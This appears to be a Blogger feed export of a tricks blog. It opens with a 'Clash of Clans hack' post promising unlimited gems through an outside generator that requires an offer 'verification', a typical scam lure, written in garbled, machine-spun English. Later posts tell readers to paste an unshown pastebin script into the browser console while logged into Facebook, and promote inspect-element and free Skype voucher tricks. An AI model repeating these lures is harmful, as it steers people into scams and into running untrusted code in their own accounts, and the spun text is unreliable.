tag:blogger.com,1999:blog-75791265924522088242024-03-14T01:45:00.758-07:00Karteek munjalkarteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comBlogger13125tag:blogger.com,1999:blog-7579126592452208824.post-87092076907696225312015-08-19T09:28:00.000-07:002015-10-22T01:11:19.157-07:00Clash of Clans Hack – Unlimited Coins, Elixir & Gems<div dir="ltr" style="text-align: left;" trbidi="on">
<title>Clash of Clans Hack – Get Unlimited Coins, Elixir & Gems</title>
<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="color: #8b8b8b; font-family: MyriadPro Regular 0, Helvetica, sans-serif;"><span style="font-size: 15px;">Hey claners, ever puzzled a way to get unlimited coins, elixir and gems with an easy clash of clans hack ? 1st of all let American state introduce myself. My name is Devil and I’ve been finding out computing for nearly a pair of years currently. i'm additionally fanatic gamer however with all that busy schedule I can’t very get pleasure from the sport and place lots of efforts therefore, clearly I can’t succeed all those precious gems and elixirs while not doing a little tricks. I’ve spent virtually three weeks to form a hack tool which will generate all those valuable resources, therefore finally no additional troubled and currently I will begin enjoying the sport at the most. I additionally thought why shouldn’t I share the tool with the remainder of the planet, right? I’m not the sole one that's busy and that i guess many of us would need it in addition.</span></span><br />
<h1 class="name post-title entry-title" itemprop="itemReviewed" itemscope="" itemtype="http://schema.org/Thing" style="background-color: white; border: 0px none; color: #333333; font-family: Oswald, arial, Georgia, serif; font-size: 28px; font-weight: normal; list-style: none; margin: 0px 0px 10px; outline: none; padding: 0px;">
<div class="entry" style="border: 0px none; font-family: Tahoma, Arial, Verdana, sans-serif; font-size: 13px; line-height: 1.5; list-style: none; margin: 0px; outline: none; padding: 0px;">
<div style="border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em; text-align: center;">
<a href="http://clashofclans.hackunivers.com/"><img alt="clash of clans hack" class="aligncenter wp-image-49 size-full" src="http://clashresources.com/wp-content/uploads/2015/01/clash-of-clans-hack.png" height="384" style="border: 1px solid rgb(203, 205, 204); clear: both; display: block; height: auto; list-style: none; margin: 2px auto; max-width: 100%; outline: none; padding: 4px;" width="512" /></a></div>
</div>
</h1>
<h2 style="background-color: white; border: 0px none; color: #333333; font-family: Helvetica; font-size: 30px; font-weight: normal; line-height: 1em; list-style: none; margin: 25px 0px 10px; outline: none; padding: 0px;">
How to Hack Clash of Clans</h2>
<h1 class="name post-title entry-title" itemprop="itemReviewed" itemscope="" itemtype="http://schema.org/Thing" style="background-color: white; border: 0px none; list-style: none; margin: 0px 0px 10px; outline: none; padding: 0px;">
<div class="entry" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px none; list-style: none; margin: 0px; outline: none; padding: 0px;">
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em; text-align: center;">
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
<span style="color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif;"><span style="font-size: 13px; font-weight: normal; line-height: 19.5px;">First of all you wish to understand that hacking is absolutely advanced method thus you don’t have to be compelled to hack something, everything is already done. I actually have created 2 versions, one may be a transfer version and another is an internet version.</span></span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
<span style="color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif;"><span style="font-size: 13px; font-weight: normal; line-height: 19.5px;">If you're skeptical regarding downloading some generators and would possibly|you would possibly|you may} think: well this might hurt my computer – no downside at all! Guess what! currently there's an internet version, it's truly a tool that's on my server and can’t hurt you in any means.</span></span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
<span style="color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif;"><span style="font-size: 13px; font-weight: normal; line-height: 19.5px;">The only issue you wish to try and do is to settle on what percentage resources would you wish in your account and press generate. once is finished simply verify your email or phone with one provide that sometimes takes one to 2 minutes. The verification method is there for a reason, as a result of i might wish to get eliminate bots that square measure mechanically generating all those gems, coins and elixirs from my generator.</span></span></div>
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
<span style="color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif;"><span style="font-size: 13px; font-weight: normal; line-height: 19.5px;"><br /></span></span></div>
</div>
</div>
</h1>
<h3 style="background-color: white; border: 0px none; color: #333333; font-family: Helvetica; font-size: 24px; font-weight: normal; line-height: 1em; list-style: none; margin: 25px 0px 10px; outline: none; padding: 0px;">
Works for Android/iOS and PC</h3>
<h1 class="name post-title entry-title" itemprop="itemReviewed" itemscope="" itemtype="http://schema.org/Thing" style="background-color: white; border: 0px none; list-style: none; margin: 0px 0px 10px; outline: none; padding: 0px;">
<div class="entry" style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px none; list-style: none; margin: 0px; outline: none; padding: 0px;">
<div style="border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em; text-align: center;">
<div style="border: 0px none; color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif; font-size: 13px; font-weight: normal; line-height: 19.5px; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
<br /></div>
<div style="border: 0px none; color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif; font-size: 13px; font-weight: normal; line-height: 19.5px; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
It doesn’t very matter what quite device you've got. you'll have humanoid phone or pill, or even iphone, ipad and even computer. It works with each single one amongst them as a result of the cheat is connecting through the clash of clans servers and is manipulating with the resources therefore the device you've got is completely not necessary and also the tool is compatible with any gizmo or computer.</div>
<div style="border: 0px none; color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif; font-size: 13px; font-weight: normal; line-height: 19.5px; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
<br /></div>
<div style="border: 0px none; color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif; font-size: 13px; font-weight: normal; line-height: 19.5px; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
<br /></div>
<div style="border: 0px none; color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif; font-size: 13px; font-weight: normal; line-height: 19.5px; list-style: none; outline: none; padding: 0px 0px 1em; text-align: start;">
<a href="http://clashofclans.hackunivers.com/" rel="nofollow" style="border: 0px none; color: #444444; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: all 0.2s ease-in-out;" target="_blank"><img alt="button-download-200x300" class=" wp-image-113 aligncenter" src="http://clashresources.com/wp-content/uploads/2015/05/button-download-200x300-200x300.png" height="377" style="border: none; clear: both; display: block; height: auto; list-style: none; margin: 2px auto; max-width: 100%; outline: none; padding: 4px;" width="251" /></a><br />
<div style="border: 0px none; color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif; font-size: 13px; font-weight: normal; line-height: 19.5px; list-style: none; outline: none; padding: 0px 0px 1em;">
<strong style="border: 0px none; list-style: none; margin: 0px; outline: none; padding: 0px;">Please NOTE:</strong></div>
<div style="border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em;">
<span style="color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif;"><span style="font-size: 13px; font-weight: normal; line-height: 19.5px;">Please don't overuse this cheat. I even have spent lots of your time of making it and I’m exploitation it for my very own functions still. By overusing, this cheat are often noticed by the sport developers therefore I recommend exploitation it one to 3 times daily. And in fact don't add several resources, you'll have lots of fun with 10k still.</span></span></div>
<div style="border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em;">
<span style="color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif;"><span style="font-size: 13px; font-weight: normal; line-height: 19.5px;">If you prefer our Clash of Clans Hack tool please share it along with your friends.</span></span></div>
<div style="border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em;">
<span style="color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif;"><span style="font-size: 13px; font-weight: normal; line-height: 19.5px;">But wait! That’s not all guys. i will be able to provide you with conjointly Associate in Nursing e-book “Clash of Clans tips and tricks”. With this guide you'll learn the way</span></span></div>
<div style="border: 0px none; list-style: none; outline: none; padding: 0px 0px 1em;">
<span style="color: #333333; font-family: Tahoma, Arial, Verdana, sans-serif;"><span style="font-size: 13px; font-weight: normal; line-height: 19.5px;">to get innumerable dark elixirs, a way to ne'er lose a fight once more and simply become one among the simplest players within the world. you may get the e-book beside the hack.</span></span>
<br />
<div hidden="">
<script id="_wauugh">var _wau = _wau || []; _wau.push(["classic", "xrinkh8vw9mh", "ugh"]);
(function() {var s=document.createElement("script"); s.async=true;
s.src="http://widgets.amung.us/classic.js";
document.getElementsByTagName("head")[0].appendChild(s);
})();</script>
</div>
</div>
</div>
</div>
</div>
</h1>
</div>
</div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-63188517275819588582014-01-30T09:59:00.000-08:002014-03-03T06:41:48.546-08:00Tag Your All Friends @ In One Click With Your Massege<div dir="ltr" style="text-align: left;" trbidi="on">
1.Go To Your Browser And Log Into Your Profile.<br />
2.Go To The Link <a href="http://pastebin.com/RCsyn5Rh">Click Here For Script</a> And Then Copy The Script And Paste It To Notepad .<br />
3.Open The Pic,Status or Page Post Where You Want To Tag The People .<br />
For Pic Copy Pic Id<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ_WA0zFvfxOT3hBIQ9u4ZmOjmj4UZc93H_hOsbyz82bluxR5Bsk4EyiNCSShDcXNj7lt3n5PgCbY52z1mPXJaSHP6g4avCoRFVSZgwyAl66srj9VPXSXl5ubbFlzZObbsiPzgq1dZl0Y/s1600/Screenshot_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ_WA0zFvfxOT3hBIQ9u4ZmOjmj4UZc93H_hOsbyz82bluxR5Bsk4EyiNCSShDcXNj7lt3n5PgCbY52z1mPXJaSHP6g4avCoRFVSZgwyAl66srj9VPXSXl5ubbFlzZObbsiPzgq1dZl0Y/s1600/Screenshot_1.jpg" height="9" width="320" /></a></div>
And For Status<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKb0k0dM35LHKBzIPDyiGD8G8DDYb9f1vib3ACQSu3H2sDCN41ndqA7eDgqFKyx4JpAlELcfzTA1F7_Y-Iz4iTM8jnSQZi4WuQfKWKfvX1Ckfd7CDCrpYtVXD6F8PIizb9QhwFasopikI/s1600/Screenshot_2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKb0k0dM35LHKBzIPDyiGD8G8DDYb9f1vib3ACQSu3H2sDCN41ndqA7eDgqFKyx4JpAlELcfzTA1F7_Y-Iz4iTM8jnSQZi4WuQfKWKfvX1Ckfd7CDCrpYtVXD6F8PIizb9QhwFasopikI/s1600/Screenshot_2.jpg" height="14" width="320" /></a></div>
Copy These Id<br />
And Go To Notepad And Look At the Top<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaOSPIFBqTwSmxgybGoGsIssLpJe4hm7stPOCt342Za7S1IWuRFhYAO665AoGWXuDi4KdrJiZwKz7Y4KGnIRkZ7Fl5Jf9mGeYP7GayL2PTKyTkt7Kfej9zBjQaAngdjORdtgcNgGRe5K4/s1600/Screenshot_3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaOSPIFBqTwSmxgybGoGsIssLpJe4hm7stPOCt342Za7S1IWuRFhYAO665AoGWXuDi4KdrJiZwKz7Y4KGnIRkZ7Fl5Jf9mGeYP7GayL2PTKyTkt7Kfej9zBjQaAngdjORdtgcNgGRe5K4/s1600/Screenshot_3.jpg" height="159" width="320" /></a></div>
Then Go To Facebook.com/Your_username_here<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj75EL-PD39olLUQ7veD3RPGvIQsyVqhIG-j7PG-b0bqGEXXWc3jldY5rPcJQF4UuqN6x2CQVJLnVKiWqM0-xgJvwIdHTRzuwpOGl9gvAXRM1YCa0fXnhpL_haSN7oSDoj9iSEwH-iF4Ik/s1600/Screenshot_4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj75EL-PD39olLUQ7veD3RPGvIQsyVqhIG-j7PG-b0bqGEXXWc3jldY5rPcJQF4UuqN6x2CQVJLnVKiWqM0-xgJvwIdHTRzuwpOGl9gvAXRM1YCa0fXnhpL_haSN7oSDoj9iSEwH-iF4Ik/s1600/Screenshot_4.jpg" height="9" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
And Then Replace www With Graph </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTRPgi_KM7ecFdr8B3atuPmpwLw3hqdW_65jPwOoFLZ2ByjoJEeZM689BWTWi4mdggOPllMuf0cH-eG2ZP0TZhh-qFNtEHHIhwl0jgjdl6QyuzFXaimha6Jmw38RQB8hTC2MHcF4ybAHM/s1600/Screenshot_5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTRPgi_KM7ecFdr8B3atuPmpwLw3hqdW_65jPwOoFLZ2ByjoJEeZM689BWTWi4mdggOPllMuf0cH-eG2ZP0TZhh-qFNtEHHIhwl0jgjdl6QyuzFXaimha6Jmw38RQB8hTC2MHcF4ybAHM/s1600/Screenshot_5.jpg" height="183" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp875d4XQt3Sgqq1K7DDCHa_Xf2CcS4bHJQa7e6vpRKdbbCgJP_rWXgVTA4B74-ZlYTt8qhTlluwsjNNkbF1EeF1iGGktbAgR0NUYrTizMTncGTP5qGOLr1vvpCQ7SthRnScoeH776-sI/s1600/Screenshot_6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp875d4XQt3Sgqq1K7DDCHa_Xf2CcS4bHJQa7e6vpRKdbbCgJP_rWXgVTA4B74-ZlYTt8qhTlluwsjNNkbF1EeF1iGGktbAgR0NUYrTizMTncGTP5qGOLr1vvpCQ7SthRnScoeH776-sI/s1600/Screenshot_6.jpg" height="79" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Now Go To The Notepad And Press Control + F And Look For //message with percent encoding for URIs</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2lGETFpLspbCXkGi4DrQCVtpozhzt5y2XYPVEhBqhLm1OvPlUmlb6JC9ekIpVWxRPCt0hg8x0hKaF3V4K9OiU3A4qWm8NfMtSQQcTZGcMqgW8BUqm9tncOC0BBu5UudakGoLwEcLXQoM/s1600/Screenshot_7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2lGETFpLspbCXkGi4DrQCVtpozhzt5y2XYPVEhBqhLm1OvPlUmlb6JC9ekIpVWxRPCt0hg8x0hKaF3V4K9OiU3A4qWm8NfMtSQQcTZGcMqgW8BUqm9tncOC0BBu5UudakGoLwEcLXQoM/s1600/Screenshot_7.jpg" height="127" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Now Copy All The Script And Go To Your Browser &</div>
<div class="separator" style="clear: both; text-align: center;">
Press Control + Shift + J For Google Chrome </div>
<div class="separator" style="clear: both; text-align: center;">
Control + Shift + K For Mozilla Firefox </div>
<div class="separator" style="clear: both; text-align: center;">
And Paste The Script there </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHWVf-4x3VDNNWeqXYwcpoyhuqH55rd7mIuOwLG1L26CWDI4OfCKI60-7NmjHSjEbZYVFnPB1jnqKTnSIi_grvoAOr1STuUkwxKC7fI-Ar0bFZkq9iiioyScDbSoS3LHmBZmP1UPUTqfw/s1600/Screenshot_8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHWVf-4x3VDNNWeqXYwcpoyhuqH55rd7mIuOwLG1L26CWDI4OfCKI60-7NmjHSjEbZYVFnPB1jnqKTnSIi_grvoAOr1STuUkwxKC7fI-Ar0bFZkq9iiioyScDbSoS3LHmBZmP1UPUTqfw/s1600/Screenshot_8.jpg" height="169" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
And Then Press Enter </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqI0pTex1xVvJ3AUCUWk1obwwIz1acVG3fPB_O1otF40EfaV9JtK_THmpOSYnYP1O9edU1hRdUpJZuEzEWYKIj5yMfbmX8_UQLY8NxqFOzxxuLJP_734UxlZJEiZHf1SivPZi16QIu2tQ/s1600/Screenshot_9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqI0pTex1xVvJ3AUCUWk1obwwIz1acVG3fPB_O1otF40EfaV9JtK_THmpOSYnYP1O9edU1hRdUpJZuEzEWYKIj5yMfbmX8_UQLY8NxqFOzxxuLJP_734UxlZJEiZHf1SivPZi16QIu2tQ/s1600/Screenshot_9.jpg" height="68" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
And You Can See People Tagging :D</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-35209884924633210962014-01-06T03:26:00.000-08:002014-01-06T03:26:59.015-08:00How To Use Two Different Profile Picture in Facebook<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;">Hai Guys Today i am going to share a new trick which was founded yesterday by Khalil (Security Researcher) From This Trick You Can Use Two Different </span><span style="background-color: white; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;"><span style="color: #1b8ede;">Profile Picture</span></span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;"> in Facebook !!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/XladxVa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/XladxVa.png" height="231" width="320" /></a></div>
<span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;"><br /></span> How To Use Two Different Profile Picture in Facebook<br />
<span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;"><br /></span>
<span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;">1. Open Your </span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;">Profile Picture</span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;"> Album and then that picture you want to use as another</span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;">profile picture</span><br />
<div class="separator" style="background-color: white; clear: both; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxmfTCyU06yg9sgX2y08JMOyjNZUeSQoIdHrQ3KBWaARbBj9Xj2x7rvTq4S6V-HIK0sEIcTsJ9MUmNzjhqE9ozACQqH69Ul2sDcB8ZhmfdEYySMOLwYO81gJwPTm1ZMXOlpxcODIpn79E/s1600/1.png" imageanchor="1" style="color: #2aa4cf; margin-left: 1em; margin-right: 1em; text-decoration: none;"><br /></a></div>
<span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;">2. Open that picture then copy the FB ID of that Picture . See Below :</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YhqwFpn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/YhqwFpn.png" height="186" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px; text-align: left;">3. Now Go To Your Timeline and hover your mouse to your current </span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px; text-align: left;">profile picture</span><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px; text-align: left;"> and right click on Edit Profile Picture then select edit thumbnail . </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px; text-align: left;">4. Now A popup box will open right click on your current profile pic and select inspect element .</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/xmbww7w.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/xmbww7w.png" height="236" width="320" /></a></div>
<br style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;" /><span style="background-color: white; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px;">5. Now Scroll Down Until You Find " <form action=”https://upload.facebook.com/save_square_pic.php</span><br />
<div class="separator" style="background-color: white; clear: both; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px; text-align: center;">
6.Then Double Click on it to expand the Code</div>
<div class="separator" style="background-color: white; clear: both; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px; text-align: center;">
7. Now Click AnyWhere and exit the inspect element and click on save. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Hql5CAn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/Hql5CAn.png" height="116" width="320" /></a></div>
<div class="separator" style="background-color: white; clear: both; color: #555555; font-family: 'Source Sans Pro', Arial, Helvetica, Geneva, sans-serif; font-size: 16px; line-height: 24px; text-align: center;">
And Now Its D0ne Enjoy The Trick .</div>
</div>
karteek munjalhttp://www.blogger.com/profile/11038471085469666615noreply@blogger.comtag:blogger.com,1999:blog-7579126592452208824.post-56453412953351964212013-12-22T01:17:00.001-08:002013-12-22T01:18:56.614-08:00Get Premium Skype Account For Free<title> Skype For Free </title>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglv1fVOao3M7pR9cyF6kbXxmQtPKW9xaClQMk4LJMH8TQdAhCaUW4CakmeykTSnIM5q01mznETWDJ7ExAiy58VVC1_nlcXmuwklMhsjA-LCevtrc5MA5dSji-pAAEhLcSvsyH1PR1sDr6J/s640/Order+No.+7260000003091707127.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglv1fVOao3M7pR9cyF6kbXxmQtPKW9xaClQMk4LJMH8TQdAhCaUW4CakmeykTSnIM5q01mznETWDJ7ExAiy58VVC1_nlcXmuwklMhsjA-LCevtrc5MA5dSji-pAAEhLcSvsyH1PR1sDr6J/s320/Order+No.+7260000003091707127.png" width="320" /></a></div>
<div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;">How To Get</span> Skype Free Premium Code of worth €71,88 for 12 months</div>
<div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;">
Skype is offering free skype Voucher/code of Worth €71,88 for 12 months. <span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;">Remember</span> the last date to get this voucher is 30th of December. Follow These Easy and simple <span class="IL_AD" id="IL_AD12" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;">method</span> to get your own free skype voucher.</div>
<div style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; vertical-align: baseline;">
</div>
<ul style="background-color: white; border: 0px; color: #555555; font-family: 'Open Sans', sans-serif; font-size: 14px; line-height: 20px; list-style: none; margin: 0px; padding: 0px; text-align: -webkit-center; vertical-align: baseline;">
<li style="background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlY9z8ISH_0UfMGXqATJ6zP3qOgxlBGGBkHoOzd35AevsfT1au1ptK8UKskmcVa22yxvcltux4m8vh6wFfZ-GF-gBUASdvgXHe54t3oPrYz5QUm7qaGwUsGzzxZeGbTDjxuA9k6pNowhc/s400/255.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;">Visit to The link <span class="IL_AD" id="IL_AD11" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;">below and</span> enter your email id and then check for <span class="IL_AD" id="IL_AD10" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;">email you</span> will have got a Code for sure.</li>
